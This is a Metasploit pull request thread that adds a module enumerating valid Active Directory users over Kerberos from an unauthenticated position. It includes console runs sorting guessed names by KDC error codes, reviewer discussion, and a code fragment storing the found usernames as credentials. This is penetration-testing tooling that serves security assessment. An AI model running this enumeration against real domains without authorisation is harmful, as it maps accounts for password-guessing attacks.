### PR TITLE
Add Kerberos domain user enumeration module 

### PR DESCRIPTION
**Pull request by attackdebris**
Add Kerberos domain user enumeration module. This module will enumerate valid Domain Users via Kerberos (88/tcp) against a Domain Controller (DC) from an unauthenticated perspective. It utilises the different responses returned by the service for valid and invalid users to identify disabled/locked accounts, enabled accounts and accounts that do not exist on the DC.
## Verification

Tested against both Windows 2008 R2 and Windows 2012 R2 Domain Controllers. 

```
use auxiliary/scanner/kerberos/kerberos_enumusers
msf auxiliary(kerberos_enumusers) > set DOMAIN mydomain
DOMAIN => mydomain
msf auxiliary(kerberos_enumusers) > set RHOST 192.168.5.10
RHOST => 192.168.5.10
msf auxiliary(kerberos_enumusers) > set USER_FILE /job/users.txt
USER_FILE => /job/users.txt
msf auxiliary(kerberos_enumusers) > run
[*] Validating options...
[*] Using domain: MYDOMAIN...
[*] 192.168.5.10:88 - Testing User: "bob"...
[*] 192.168.5.10:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 192.168.5.10:88 - User: "bob" is present
[*] 192.168.5.10:88 - Testing User: "alice"...
[*] 192.168.5.10:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 192.168.5.10:88 - User: "alice" is present
[*] 192.168.5.10:88 - Testing User: "bob2"...
[*] 192.168.5.10:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 192.168.5.10:88 - User: "bob2" does not exist
[*] 192.168.5.10:88 - Testing User: "bob3"...
[*] 192.168.5.10:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 192.168.5.10:88 - User: "bob3" does not exist
[*] 192.168.5.10:88 - Testing User: "test123"...
[*] 192.168.5.10:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 192.168.5.10:88 - User: "test123" is present
[*] 192.168.5.10:88 - Testing User: "matt"...
[*] 192.168.5.10:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 192.168.5.10:88 - User: "matt" is present
[*] 192.168.5.10:88 - Testing User: "guest"...
[*] 192.168.5.10:88 - KDC_ERR_CLIENT_REVOKED - Clients credentials have been revoked
[-] 192.168.5.10:88 - User: "guest" account disabled or locked out
[*] 192.168.5.10:88 - Testing User: "admint"...
[*] 192.168.5.10:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 192.168.5.10:88 - User: "admint" does not exist
[*] 192.168.5.10:88 - Testing User: "admin"...
[*] 192.168.5.10:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 192.168.5.10:88 - User: "admin" does not exist
[*] 192.168.5.10:88 - Testing User: "administrator"...
[*] 192.168.5.10:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 192.168.5.10:88 - User: "administrator" does not exist
[*] Auxiliary module execution completed
```

Shortened user list used for screenshot purposes:

kerberos_enumusers

### CODE REVIEW

**Comment by bwatters-r7** [comment]
Ooooooooh!  I was not expecting this to work.... Nice!
```
msf auxiliary(kerberos_enumusers) > show options

Module options (auxiliary/scanner/kerberos/kerberos_enumusers):

   Name       Current Setting                 Required  Description
   ----       ---------------                 --------  -----------
   DOMAIN     домен                      yes       The Domain Eg: demo.local
   RHOST      <DC_IP>                  yes       The target address
   RPORT      88                              yes       The target port
   Timeout    10                              yes       The TCP timeout to establish connection and read data
   USER_FILE  /home/bwatters/rapid7/userlist  yes       Files containing usernames, one per line

msf auxiliary(kerberos_enumusers) > run

[*] Validating options...
[*] Using domain: домен...
[*] <DC_IP>:88 - Testing User: "пользователь"...
[*] <DC_IP>:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] <DC_IP>:88 - User: "пользователь" does not exist
[*] <DC_IP>:88 - Testing User: "пользователь1"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "пользователь1" is present
[*] <DC_IP>:88 - Testing User: "пользователь2"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "пользователь2" is present
[*] <DC_IP>:88 - Testing User: "администратор"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "администратор" is present
[*] Auxiliary module execution completed
msf auxiliary(kerberos_enumusers) > 
```

**Comment by bwatters-r7** [comment]
Also, not as exciting, in English:
```
msf auxiliary(kerberos_enumusers) > show options

Module options (auxiliary/scanner/kerberos/kerberos_enumusers):

   Name       Current Setting                 Required  Description
   ----       ---------------                 --------  -----------
   DOMAIN     test                            yes       The Domain Eg: demo.local
   RHOST      <DC_IP>                  yes       The target address
   RPORT      88                              yes       The target port
   Timeout    10                              yes       The TCP timeout to establish connection and read data
   USER_FILE  /home/bwatters/rapid7/users_en  yes       Files containing usernames, one per line

msf auxiliary(kerberos_enumusers) > run

[*] Validating options...
[*] Using domain: TEST...
[*] <DC_IP>:88 - Testing User: "ppotts"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "ppotts" is present
[*] <DC_IP>:88 - Testing User: "loki"...
[*] <DC_IP>:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] <DC_IP>:88 - User: "loki" does not exist
[*] <DC_IP>:88 - Testing User: "bbanner"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "bbanner" is present
[*] <DC_IP>:88 - Testing User: "ultron"...
[*] <DC_IP>:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] <DC_IP>:88 - User: "ultron" does not exist
[*] <DC_IP>:88 - Testing User: "rracoon"...
[*] <DC_IP>:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] <DC_IP>:88 - User: "rracoon" does not exist
[*] <DC_IP>:88 - Testing User: "hzemo"...
[*] <DC_IP>:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] <DC_IP>:88 - User: "hzemo" does not exist
[*] <DC_IP>:88 - Testing User: "iheartshells"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "iheartshells" is present
[*] <DC_IP>:88 - Testing User: "ddoom"...
[*] <DC_IP>:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] <DC_IP>:88 - User: "ddoom" does not exist
[*] <DC_IP>:88 - Testing User: "cbarton"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "cbarton" is present
[*] <DC_IP>:88 - Testing User: "kang"...
[*] <DC_IP>:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] <DC_IP>:88 - User: "kang" does not exist
[*] <DC_IP>:88 - Testing User: "mhill"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "mhill" is present
[*] <DC_IP>:88 - Testing User: "kree"...
[*] <DC_IP>:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] <DC_IP>:88 - User: "kree" does not exist
[*] <DC_IP>:88 - Testing User: "nromanoff"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "nromanoff" is present
[*] <DC_IP>:88 - Testing User: "pcoulson"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "pcoulson" is present
[*] <DC_IP>:88 - Testing User: "srogers"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "srogers" is present
[*] <DC_IP>:88 - Testing User: "tstark"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "tstark" is present
[*] Auxiliary module execution completed
msf auxiliary(kerberos_enumusers) > 
```

**Comment by bwatters-r7** [comment]
@attackdebris, this is great, and I'm looking forward to getting it in metasploit, but I'm a bit curious why this is under aux/scanner as opposed to aux/gather.  It looks like you are not leveraging the RHOSTS value to iterate through multiple IPs, and while my DC fu is not incredibly strong,  I'm led to believe that such a functionality would only serve in edge cases.  Was the intent for the module to iterate through a list of DC's scanning each one, or to only hit one DC at a time?

**Comment by attackdebris** [comment]
@bwatters-r7 many thanks for taking a look at this and the feedback. Indeed it does make more sense to have it under aux/gather, as you'd only ever be targeting a single DC due to the DOMAIN (name) requirement, I'll get it moved over....and get some documentation sorted out.

**Comment by bwatters-r7** [comment]
@attackdebris, awesome!

**Comment by bwatters-r7** [comment]
@attackdebris, I was playing around and realized that we should probably store those usernames if they have an account.  I'd never done it before, so I used this as an excuse to learn and added the code to save the existing users to the db and fired it off to you.  Let me know your thoughts.  Merge if you like it.
https://github.com/attackdebris/metasploit-framework/pull/1

Thanks!

**Comment by attackdebris** [comment]
@bwatters-r7 That's looking really good, I've not done that myself before either, so you've taught me how to do it...useful info to have stored too.

**Comment by bwatters-r7** [comment]
## Final Test
```
msf auxiliary(kerberos_enumusers) > show options

Module options (auxiliary/gather/kerberos_enumusers):

   Name       Current Setting                 Required  Description
   ----       ---------------                 --------  -----------
   DOMAIN     домен                      yes       The Domain Eg: demo.local
   RHOST      <DC_IP>                  yes       The target address
   RPORT      88                              yes       The target port
   Timeout    10                              yes       The TCP timeout to establish connection and read data
   USER_FILE  /home/bwatters/rapid7/userlist  yes       Files containing usernames, one per line

msf auxiliary(kerberos_enumusers) > run

[*] Validating options...
[*] Using domain: домен...
[*] <DC_IP>:88 - Testing User: "пользователь"...
[*] <DC_IP>:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] <DC_IP>:88 - User: "пользователь" does not exist
[*] <DC_IP>:88 - Testing User: "пользователь1"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "пользователь1" is present
[*] <DC_IP>:88 - Testing User: "пользователь2"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "пользователь2" is present
[*] <DC_IP>:88 - Testing User: "администратор"...
[*] <DC_IP>:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] <DC_IP>:88 - User: "администратор" is present
[*] Auxiliary module execution completed
msf auxiliary(kerberos_enumusers) > creds
Credentials
===========

host            origin          service                    public                      private  realm  private_type
----            ------          -------                    ------                      -------  -----  ------------
<DC_IP>  <DC_IP>  88/udp (Active Directory)  пользователь1                   
<DC_IP>  <DC_IP>  88/udp (Active Directory)  пользователь2                   
<DC_IP>  <DC_IP>  88/udp (Active Directory)  администратор                  

msf auxiliary(kerberos_enumusers) > 

```

File: modules/auxiliary/gather/kerberos_enumusers.rb [hunk 1]
```diff
@@ -0,0 +1,127 @@
...
+        pa_data: pre_auth
+      )
+      print_status("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
+      test = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
+      if test == ["KDC_ERR_PREAUTH_REQUIRED", "Additional pre-authentication required"]
+        print_good("#{peer} - User: \"#{user}\" is present")
+        report_cred(
+          host: datastore['RHOST'],
+          port: rport,
+          creds_name: 'Active Directory',
```
Comment (bwatters-r7) [inline modules/auxiliary/gather/kerberos_enumusers.rb]: This was my fault; This should be 'Kerberos', not 'Active Directory'

**Comment by attackdebris** [comment]
@bwatters-r7 That looks more accurate:

```
msf auxiliary(kerberos_enumusers) > creds
Credentials
===========

host          origin        service            public  private  realm  private_type
----          ------        -------            ------  -------  -----  ------------
192.168.5.10  192.168.5.10  88/udp (Kerberos)  bob                     
192.168.5.10  192.168.5.10  88/udp (Kerberos)  alice                   
192.168.5.10  192.168.5.10  88/udp (Kerberos)  matt     
```

**Comment by bwatters-r7** [comment]
# Release Notes
There exists an information leak in the Kerberos authentication process such that when with a failed authentication, the server's response will indicate if the username attempted is valid.  This module abuses that information leak to determine if a username is a valid user on the domain.  It uses a file containing a list of "guesses" and attempts to authenticate, printing the status of the username to the screen and storing it to `creds` table if it is valid.

**Comment by mubix** [comment]
btw, this works great against OSX ;-)

**Comment by bwatters-r7** [comment]
@mubix, <sigh>

**Comment by mubix** [comment]
@bwatters-r7 ,

**Comment by wvu-r7** [comment]
Sneaky @mubix, lol.

**Pull request merged**